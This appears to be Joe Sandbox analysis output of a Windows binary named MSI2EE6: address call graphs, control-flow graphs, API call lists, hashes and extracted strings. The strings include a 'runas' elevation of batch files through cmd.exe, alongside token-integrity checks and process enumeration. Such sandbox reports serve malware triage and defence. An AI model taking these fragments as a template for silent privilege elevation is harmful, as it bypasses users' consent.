ad93db 35206->35207 35231 ad9e60 35207->35231 35209 ad9e41 35208->35209 35210 ad9be2 35208->35210 35247 ad46f0 42 API calls 35209->35247 35212 ad3b90 42 API calls 35210->35212 35213 ad9e4b 35211->35213 35214 ad9d5b 35211->35214 35227 ad9ce9 35211->35227 35216 ad9c06 35212->35216 35249 ad46f0 42 API calls 35213->35249 35217 ad3b90 42 API calls 35214->35217 35244 ada160 45 API calls __Strxfrm 35216->35244 35221 ad9d7f 35217->35221 35218 ad9e46 35248 afe352 41 API calls 2 library calls 35218->35248 35246 ad3d40 42 API calls 35221->35246 35224 ad9c21 35245 ad3d40 42 API calls 35224->35245 35227->35206 35228 ad9c6a 35228->35218 35228->35227 35229 ad9cde 35228->35229 35229->35227 35230 ad9ce2 LocalFree 35229->35230 35230->35227 35238 ad9edc __Strxfrm 35231->35238 35232 ad93f3 35232->35030 35233 ada105 35233->35232 35235 ada11f LocalFree 35233->35235 35234 ada14f 35250 afe352 41 API calls 2 library calls 35234->35250 35235->35232 35237 ada154 35251 ad46f0 42 API calls 35237->35251 35238->35232 35238->35233 35238->35234 35238->35237 35244->35224 35245->35228 35246->35227 35252->35141 35254 ad6087 GetTokenInformation 35253->35254 35255 ad6081 35253->35255 35256 ad60be CloseHandle 35254->35256 35257 ad60b6 35254->35257 35255->35146 35256->35146 35257->35256 35258->35150 35259->35154 35260->35158 35262 ad7874 35261->35262 35315 ad2130 35262->35315 35264 ad788c 35265 ad2130 42 API calls 35264->35265 35266 ad78a3 35265->35266 35331 ad7fb0 35266->35331 35268 ad78bb 35269 ad7c8b 35268->35269 35271 ad78ea 35268->35271 35351 ad2820 41 API calls 35268->35351 35357 ad18f0 LocalFree RaiseException Concurrency::cancel_current_task 35269->35357 35348 b02ac9 35271->35348 35272 ad7c95 GetWindowThreadProcessId 35276 ad7cbe GetWindowLongW 35272->35276 35277 ad7cf1 35272->35277 35276->35163 35277->35163 35278 ad7909 35279 ad2130 42 API calls 35278->35279 35295 ad791e 35279->35295 35280 ad7a08 35281 ad7a5d GetForegroundWindow 35280->35281 35282 ad7a66 35280->35282 35281->35282 35283 ad7a76 ShellExecuteExW 35282->35283 35284 ad7a90 35283->35284 35285 ad7a87 35283->35285 35288 ad7acb 35284->35288 35290 ad7aa6 ShellExecuteExW 35284->35290 35354 ad7e40 6 API calls 35285->35354 35286 ad79cf GetWindowsDirectoryW 35352 ad1960 64 API calls 35286->35352 35293 ad7af7 GetModuleHandleW GetProcAddress 35288->35293 35294 ad7bb1 35288->35294 35290->35288 35292 ad7ac2 35290->35292 35291 ad79f0 35353 ad1960 64 API calls 35291->35353 35355 ad7e40 6 API calls 35292->35355 35301 ad7b1b GetProcessId AllowSetForegroundWindow 35293->35301 35298 ad7bd8 35294->35298 35299 ad7bc2 WaitForSingleObject GetExitCodeProcess 35294->35299 35295->35280 35295->35286 35356 ad7f30 CloseHandle 35298->35356 35299->35298 35301->35294 35302 ad7b2f 35301->35302 35302->35294 35303 ad7b38 GetModuleHandleW GetProcAddress 35302->35303 35304 ad7bae 35303->35304 35308 ad7b56 35303->35308 35304->35294 35305 ad7be7 35306 af9557 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 35305->35306 35307 ad7c83 35306->35307 35307->35163 35308->35304 35309 ad7b6c Sleep EnumWindows 35308->35309 35309->35308 35310 ad7b98 SetWindowPos 35309->35310 35310->35304 35311->35153 35312->35157 35313->35161 35314->35164 35317 ad2144 35315->35317 35316 ad2157 35316->35264 35317->35316 35318 ad2203 35317->35318 35322 ad2181 ctype 35317->35322 35320 ad2208 HeapAlloc 35318->35320 35319 ad21a7 35358 afe440 14 API calls __dosmaperr 35319->35358 35320->35264 35322->35319 35324 ad21c6 __Strxfrm 35322->35324 35326 ad21e8 35322->35326 35323 ad21ac 35359 afe342 41 API calls __cftoe 35323->35359 35324->35264 35326->35324 35360 afe440 14 API calls __dosmaperr 35326->35360 35327 ad21b7 35327->35264 35329 ad21f1 35361 afe342 41 API calls __cftoe 35329->35361 35332 ad8025 35331->35332 35333 ad7ff1 35331->35333 35342 ad8043 35332->35342 35362 ad25b0 51 API calls 35332->35362 35334 ad2130 42 API calls 35333->35334 35335 ad7ff9 35334->35335 35335->35268 35337 ad8116 35366 ad18f0 LocalFree RaiseException Concurrency::cancel_current_task 35337->35366 35338 ad810c 35365 ad18f0 LocalFree RaiseException Concurrency::cancel_current_task 35338->35365 35341 ad8125 35342->35337 35342->35338 35343 ad80b7 35342->35343 35344 ad80dc 35343->35344 35363 afe440 14 API calls __dosmaperr 35343->35363 35344->35268 35346 ad80d1 35364 afe342 41 API calls __cftoe 35346->35364 35367 b02ae0 35348->35367 35351->35271 35352->35291 35353->35280 35354->35284 35355->35288 35356->35305 35357->35272 35358->35323 35359->35327 35360->35329 35361->35324 35362->35342 35363->35346 35364->35344 35365->35337 35366->35341 35372 b02694 35367->35372 35373 b026b2 35372->35373 35374 b026ab 35372->35374 35373->35374 35417 b0c819 41 API calls 3 library calls 35373->35417 35380 b02950 35374->35380 35376 b026d3 35418 b0cb58 41 API calls __Getctype 35376->35418 35378 b026e9 35419 b0cbb6 41 API calls __cftoe 35378->35419 35381 b02980 ___crtCompareStringW 35380->35381 35382 b0296a 35380->35382 35381->35382 35385 b02997 35381->35385 35420 afe440 14 API calls __dosmaperr 35382->35420 35384 b0296f 35421 afe342 41 API calls __cftoe 35384->35421 35392 b02979 35385->35392 35422 b0e01c 6 API calls 2 library calls 35385->35422 35388 b029e5 35389 b02a06 35388->35389 35390 b029ef 35388->35390 35394 b02a0b 35389->35394 35395 b02a1c 35389->35395 35423 afe440 14 API calls __dosmaperr 35390->35423 35391 af9557 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 35396 ad78f8 35391->35396 35392->35391 35425 afe440 14 API calls __dosmaperr 35394->35425 35399 b02a9d 35395->35399 35402 b02a43 35395->35402 35408 b02a30 __alloca_probe_16 35395->35408 35396->35269 35396->35278 35397 b029f4 35424 afe440 14 API calls __dosmaperr 35397->35424 35430 afe440 14 API calls __dosmaperr 35399->35430 35426 b0cb0a 15 API calls 2 library calls 35402->35426 35403 b02aa2 35431 afe440 14 API calls __dosmaperr 35403->35431 35406 b02a49 35406->35399 35406->35408 35407 b02a8a 35432 af8f35 14 API calls ~collate 35407->35432 35408->35399 35410 b02a5d 35408->35410 35427 b0e01c 6 API calls 2 library calls 35410->35427 35412 b02a79 35413 b02a80 35412->35413 35414 b02a91 35412->35414 35428 b02b17 41 API calls 2 library calls 35413->35428 35429 afe440 14 API calls __dosmaperr 35414->35429 35417->35376 35418->35378 35419->35374 35420->35384 35421->35392 35422->35388 35423->35397 35424->35392 35425->35384 35426->35406 35427->35412 35428->35407 35429->35407 35430->35403 35431->35407 35432->35392 35433 ad81b0 35436 ad8210 GetTokenInformation 35433->35436 35437 ad828e GetLastError 35436->35437 35438 ad81e8 35436->35438 35437->35438 35439 ad8299 35437->35439 35440 ad82de GetTokenInformation 35439->35440 35441 ad82b9 35439->35441 35442 ad82a9 ctype 35439->35442 35440->35438 35445 ad84a0 47 API calls 2 library calls 35441->35445 35442->35440 35444 ad82c2 35444->35440 35445->35444

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 ad7800-ad78cb call ad8770 call ad2130 * 2 call ad7fb0 9 ad7c8b-ad7cbc call ad18f0 GetWindowThreadProcessId 0->9 10 ad78d1-ad78e0 0->10 18 ad7cbe-ad7cee GetWindowLongW 9->18 19 ad7cf1-ad7cf8 9->19 12 ad78ed-ad7903 call b02ac9 10->12 13 ad78e2-ad78ea call ad2820 10->13 12->9 21 ad7909-ad7939 call ad2130 12->21 13->12 24 ad793b-ad7953 21->24 25 ad7956-ad795a 21->25 24->25 26 ad7a0e-ad7a5b 25->26 27 ad7960-ad7965 25->27 28 ad7a5d-ad7a63 GetForegroundWindow 26->28 29 ad7a66-ad7a68 26->29 31 ad7967-ad796d 27->31 28->29 32 ad7a6a-ad7a74 call ad7d00 29->32 33 ad7a76-ad7a85 ShellExecuteExW 29->33 34 ad798d-ad798f 31->34 35 ad796f-ad7972 31->35 32->33 38 ad7a95-ad7a97 33->38 39 ad7a87-ad7a92 call ad7e40 33->39 36 ad7992-ad7994 34->36 41 ad7989-ad798b 35->41 42 ad7974-ad797c 35->42 43 ad79cf-ad7a0b GetWindowsDirectoryW call ad1960 * 2 36->43 44 ad7996-ad799d 36->44 47 ad7a99-ad7a9f 38->47 48 ad7acb-ad7af1 call ad8130 38->48 39->38 41->36 42->34 49 ad797e-ad7987 42->49 43->26 51 ad79a0-ad79a6 44->51 54 ad7aa6-ad7ac0 ShellExecuteExW 47->54 55 ad7aa1-ad7aa4 47->55 61 ad7af7-ad7b29 GetModuleHandleW GetProcAddress GetProcessId AllowSetForegroundWindow 48->61 62 ad7bb1-ad7bb6 48->62 49->31 49->41 57 ad79a8-ad79ab 51->57 58 ad79c6-ad79c8 51->58 54->48 60 ad7ac2-ad7ac6 call ad7e40 54->60 55->48 55->54 63 ad79ad-ad79b5 57->63 64 ad79c2-ad79c4 57->64 65 ad79cb-ad79cd 58->65 60->48 61->62 76 ad7b2f-ad7b36 61->76 68 ad7bd8-ad7bfb call ad7f30 62->68 69 ad7bb8-ad7bc0 62->69 63->58 70 ad79b7-ad79c0 63->70 64->65 65->26 65->43 77 ad7bfd-ad7c11 68->77 78 ad7c14-ad7c25 68->78 69->68 72 ad7bc2-ad7bd2 WaitForSingleObject GetExitCodeProcess 69->72 70->51 70->64 72->68 76->62 79 ad7b38-ad7b54 GetModuleHandleW GetProcAddress 76->79 77->78 82 ad7c3b-ad7c50 78->82 83 ad7c27-ad7c37 78->83 80 ad7bae 79->80 81 ad7b56-ad7b65 79->81 80->62 94 ad7b67-ad7b6a 81->94 84 ad7c66-ad7c8a call af9557 82->84 85 ad7c52-ad7c62 82->85 83->82 85->84 94->80 95 ad7b6c-ad7b96 Sleep EnumWindows 94->95 95->94 96 ad7b98-ad7ba8 SetWindowPos 95->96 96->80
                                                                          APIs
                                                                          • GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,?,?), ref: 00AD79D8
                                                                          • GetForegroundWindow.USER32(?,?,?), ref: 00AD7A5D
                                                                          • ShellExecuteExW.SHELL32(?), ref: 00AD7A7A
                                                                          • ShellExecuteExW.SHELL32(?), ref: 00AD7AB8
                                                                          • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?), ref: 00AD7B01
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00AD7B08
                                                                          • GetProcessId.KERNELBASE(?,?,?,?), ref: 00AD7B1B
                                                                          • AllowSetForegroundWindow.USER32(00000000), ref: 00AD7B1E
                                                                          • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?), ref: 00AD7B42
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00AD7B49
                                                                          • Sleep.KERNEL32(00000064,?,?,?,?), ref: 00AD7B6E
                                                                          • EnumWindows.USER32(00AD7CA0,?), ref: 00AD7B8A
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00004003,?,?,?,?), ref: 00AD7BA8
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?), ref: 00AD7BC5
                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00AD7BD2
                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00AD7CAC
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00AD7CC4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Process$AddressExecuteForegroundHandleModuleProcShellWindows$AllowCodeDirectoryEnumExitLongObjectSingleSleepThreadWait
                                                                          • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
                                                                          • API String ID: 1995445601-986041216
                                                                          • Opcode ID: 74b9531ccaacac82774e877d2f4321e1eba78022e81af92e09a6d5ecaaa02576
                                                                          • Instruction ID: 6f9c83365487ea7c330ac94b490fe8f0f1e9afa566985646ead311859f093a33
                                                                          • Opcode Fuzzy Hash: 74b9531ccaacac82774e877d2f4321e1eba78022e81af92e09a6d5ecaaa02576
                                                                          • Instruction Fuzzy Hash: 2EF19171A042099FDB14DFA8C999AEDB7F5FF18310F54816AE916E7391EB309E01CB60

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000008,?,5E20FB0F), ref: 00AD6070
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00AD6077
                                                                          • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00AD60AC
                                                                          • CloseHandle.KERNEL32(?), ref: 00AD60C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                          • String ID:
                                                                          • API String ID: 215268677-0
                                                                          • Opcode ID: 07f4fd23cc6858e62bae1d39692f70e37fa7ba23e466aa9f62c4d16bdbecb56e
                                                                          • Instruction ID: 33231765ca78337ee5c29f7a2de74e4d1947f67101e0d5b3fd74f7e9b377b7ce
                                                                          • Opcode Fuzzy Hash: 07f4fd23cc6858e62bae1d39692f70e37fa7ba23e466aa9f62c4d16bdbecb56e
                                                                          • Instruction Fuzzy Hash: 18F012B4144301ABE710DF10EC49B9A77E8BB48700F94C819FD95C2260D7B9D51CDA63

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCommandLineW.KERNEL32(5E20FB0F,?,0000FFFF), ref: 00AE200D
                                                                            • Part of subcall function 00AD4F60: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,00000000,00000000,?,?), ref: 00AD4F7D
                                                                          • ExitProcess.KERNEL32 ref: 00AE21E7
                                                                            • Part of subcall function 00AD89D0: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00AD8A4D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                          • String ID: Full command line:
                                                                          • API String ID: 1878577176-831861440
                                                                          • Opcode ID: 5673beda1212ac66730e56f5c3bc532e67bcf77a750544e5cc9b06be601cd561
                                                                          • Instruction ID: 26f675d5ec7a39fd32bb861f0d5909d67bfef6c3bbfa3f5c08285a8d80ac2191
                                                                          • Opcode Fuzzy Hash: 5673beda1212ac66730e56f5c3bc532e67bcf77a750544e5cc9b06be601cd561
                                                                          • Instruction Fuzzy Hash: 3C51C5318001689BCF25EB20DD99BEEB7B5AF55740F1441D9E00A673A2EF745F48CB91

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 160 ad8210-ad828c GetTokenInformation 161 ad828e-ad8297 GetLastError 160->161 162 ad82f0-ad8303 160->162 161->162 163 ad8299-ad82a7 161->163 164 ad82ae 163->164 165 ad82a9-ad82ac 163->165 167 ad82de-ad82ea GetTokenInformation 164->167 168 ad82b0-ad82b7 164->168 166 ad82db 165->166 166->167 167->162 169 ad82b9-ad82c5 call ad84a0 168->169 170 ad82c7-ad82d8 call afadc0 168->170 169->167 170->166
                                                                          APIs
                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00AD81E8,5E20FB0F), ref: 00AD8284
                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00AD81E8,5E20FB0F), ref: 00AD828E
                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00AD81E8,5E20FB0F), ref: 00AD82EA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: InformationToken$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2567405617-0
                                                                          • Opcode ID: f3046a654e850405624a527de9801a96fc0d7370294fbf37e8ab90861a14d13a
                                                                          • Instruction ID: 528f44edfeba78117f320a0f9b1a2a647aede9bc48df50b05200fa97a2c90775
                                                                          • Opcode Fuzzy Hash: f3046a654e850405624a527de9801a96fc0d7370294fbf37e8ab90861a14d13a
                                                                          • Instruction Fuzzy Hash: 43315071A00605AFD724CF99CC45BAFBBF9FB44714F10452AE426A7380DBB5A9048B90

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 175 b0e125-b0e130 176 b0e132-b0e13c 175->176 177 b0e13e-b0e144 175->177 176->177 178 b0e172-b0e17d call afe440 176->178 179 b0e146-b0e147 177->179 180 b0e15d-b0e16e RtlAllocateHeap 177->180 184 b0e17f-b0e181 178->184 179->180 182 b0e170 180->182 183 b0e149-b0e150 call b0c280 180->183 182->184 183->178 188 b0e152-b0e15b call b11bb2 183->188 188->178 188->180
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000008,?,?,?,00B0C9B7,00000001,00000364,?,00000006,000000FF,?,00AFE012,?,?,?), ref: 00B0E166
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: 35408d0af146495eb7052463152f61860d6fd91e8db6b4d095fdfa07408b24c5
                                                                          • Instruction ID: 99444d4095bf0ef0470f3e02e89fe9de616aa88f3186523a51bfaefa9d870b28
                                                                          • Opcode Fuzzy Hash: 35408d0af146495eb7052463152f61860d6fd91e8db6b4d095fdfa07408b24c5
                                                                          • Instruction Fuzzy Hash: 1DF0B472200224A6DB215A659C05A5B7FDAEF41BA0B18C991FD64B72D0CA30DC0182E0

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 389 ad6fe0-ad702e call ad6060 392 ad7030-ad704d call ad7800 389->392 393 ad7052-ad708a CoInitialize CoCreateInstance 389->393 399 ad7692-ad76ac call af9557 392->399 395 ad708c-ad7090 393->395 396 ad7095-ad70e7 VariantInit 393->396 398 ad7661-ad766a 395->398 409 ad70e9-ad70ed 396->409 410 ad70f2-ad7116 IUnknown_QueryService 396->410 400 ad767c-ad7687 398->400 401 ad766c-ad767a 398->401 403 ad768f 400->403 404 ad7689 CoUninitialize 400->404 401->400 403->399 404->403 411 ad7635-ad763e 409->411 412 ad7118-ad711c 410->412 413 ad7121-ad7145 410->413 415 ad7650-ad765b VariantClear 411->415 416 ad7640-ad764e 411->416 414 ad761a-ad7623 412->414 422 ad7147-ad714b 413->422 423 ad7150-ad717b 413->423 414->411 417 ad7625-ad7633 414->417 415->398 416->415 417->411 424 ad75ff-ad7608 422->424 429 ad717d-ad7181 423->429 430 ad7186-ad71ae 423->430 424->414 426 ad760a-ad7618 424->426 426->414 431 ad75e4-ad75ed 429->431 436 ad71b9-ad71dd 430->436 437 ad71b0-ad71b4 430->437 431->424 432 ad75ef-ad75fd 431->432 432->424 443 ad71df-ad71e3 436->443 444 ad71e8-ad7210 436->444 438 ad75c9-ad75d2 437->438 438->431 440 ad75d4-ad75e2 438->440 440->431 445 ad75ae-ad75b7 443->445 450 ad721b-ad722d CoAllowSetForegroundWindow 444->450 451 ad7212-ad7216 444->451 445->438 446 ad75b9-ad75c7 445->446 446->438 453 ad722f-ad7231 450->453 454 ad7292-ad72a3 SysAllocString 450->454 452 ad7593-ad759c 451->452 452->445 455 ad759e-ad75ac 452->455 458 ad7237-ad7258 SysAllocString 453->458 456 ad76bc-ad7702 call ad18f0 454->456 457 ad72a9 454->457 455->445 469 ad7714-ad7723 456->469 470 ad7704-ad7712 456->470 457->458 460 ad725a-ad725c 458->460 461 ad7262-ad7286 SysAllocString 458->461 460->461 464 ad76b2-ad76b7 call ae2270 460->464 465 ad7288-ad728a 461->465 466 ad72ab-ad7335 VariantInit 461->466 464->456 465->464 467 ad7290 465->467 474 ad7337-ad733b 466->474 475 ad7340-ad7344 466->475 467->466 470->469 476 ad7544-ad758d VariantClear * 4 SysFreeString 474->476 477 ad734a-ad734f 475->477 478 ad7540 475->478 476->452 479 ad7352-ad7371 477->479 478->476 480 ad7377-ad7380 479->480 480->480 481 ad7382-ad73fe call ad3b90 call ad4180 call ad62c0 call ad3d40 480->481 490 ad742f-ad744b 481->490 491 ad7400-ad7411 481->491 494 ad744d-ad7450 490->494 495 ad7452 490->495 492 ad7424-ad7426 491->492 493 ad7413-ad741e 491->493 492->490 497 ad7428-ad7429 LocalFree 492->497 493->492 496 ad76ad call afe352 493->496 498 ad7459-ad745b 494->498 495->498 496->464 497->490 500 ad7461-ad746b 498->500 501 ad74e0-ad74ef 498->501 504 ad747d-ad74b0 OpenProcess WaitForSingleObject 500->504 505 ad746d-ad747b call ad6b60 500->505 502 ad74f1-ad7500 501->502 503 ad7533-ad753a 501->503 509 ad7513-ad7515 502->509 510 ad7502-ad750d 502->510 503->478 503->479 507 ad74ba-ad74ca 504->507 508 ad74b2-ad74b4 GetExitCodeProcess 504->508 505->504 512 ad74dd 507->512 513 ad74cc-ad74d3 CloseHandle 507->513 508->507 514 ad751e-ad752c 509->514 515 ad7517-ad7518 LocalFree 509->515 510->496 510->509 512->501 513->512 514->503 515->514
                                                                          APIs
                                                                            • Part of subcall function 00AD6060: GetCurrentProcess.KERNEL32(00000008,?,5E20FB0F), ref: 00AD6070
                                                                            • Part of subcall function 00AD6060: OpenProcessToken.ADVAPI32(00000000), ref: 00AD6077
                                                                          • CoInitialize.OLE32(00000000), ref: 00AD7052
                                                                          • CoCreateInstance.OLE32(00B1ED30,00000000,00000004,00B29370,00000000,?), ref: 00AD7082
                                                                          • CoUninitialize.OLE32 ref: 00AD7689
                                                                          • _com_issue_error.COMSUPP ref: 00AD76B7
                                                                            • Part of subcall function 00AD18F0: LocalFree.KERNEL32(?,5E20FB0F,?,00000000,00B1A160,000000FF,?,?,00B2F358,?,?,00AD16B6,80004005), ref: 00AD193C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CreateCurrentFreeInitializeInstanceLocalOpenTokenUninitialize_com_issue_error
                                                                          • String ID: $
                                                                          • API String ID: 2507920217-3993045852
                                                                          • Opcode ID: 3a9e5cc36fc80904efe5e94a3af8085c9d82fb83ec68d68386ddfb15b39291ad
                                                                          • Instruction ID: a9559f8d9195cd748dca9ca5063159716c876c9dc692dafca1dcb44311e7ca1b
                                                                          • Opcode Fuzzy Hash: 3a9e5cc36fc80904efe5e94a3af8085c9d82fb83ec68d68386ddfb15b39291ad
                                                                          • Instruction Fuzzy Hash: CC32B470E04258DFDF15CFA8C918B9DBBB4AF09304F14819AE816E7391EB749E45CB51
                                                                          APIs
                                                                          • _swprintf.LIBCMT ref: 00ADD63F
                                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00ADD6AF
                                                                          • _swprintf.LIBCMT ref: 00ADD88F
                                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 00ADD8FF
                                                                          • _swprintf.LIBCMT ref: 00ADD9D8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: _swprintf$FreeLocal
                                                                          • String ID: %$+
                                                                          • API String ID: 2429749586-2626897407
                                                                          • Opcode ID: e68486432b24bb13833f900144370d7931cd5c42e966bd10386b2d7f88fda970
                                                                          • Instruction ID: df497986f2afb47726ce2deab14a8793aee01367fd7421175a78d1b8b97e09ed
                                                                          • Opcode Fuzzy Hash: e68486432b24bb13833f900144370d7931cd5c42e966bd10386b2d7f88fda970
                                                                          • Instruction Fuzzy Hash: D602CC71D10219AFDB15DFA8DC44BAEBBB5FF48304F14422AF806AB381DB35A945CB90
                                                                          APIs
                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,5E20FB0F), ref: 00AD6332
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00AD6373
                                                                          • Process32FirstW.KERNEL32(?,0000022C), ref: 00AD63B5
                                                                          • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00AD63D0
                                                                          • CloseHandle.KERNEL32(?), ref: 00AD6527
                                                                          • Process32NextW.KERNEL32(?,0000022C), ref: 00AD6544
                                                                          • CloseHandle.KERNEL32(?), ref: 00AD6575
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
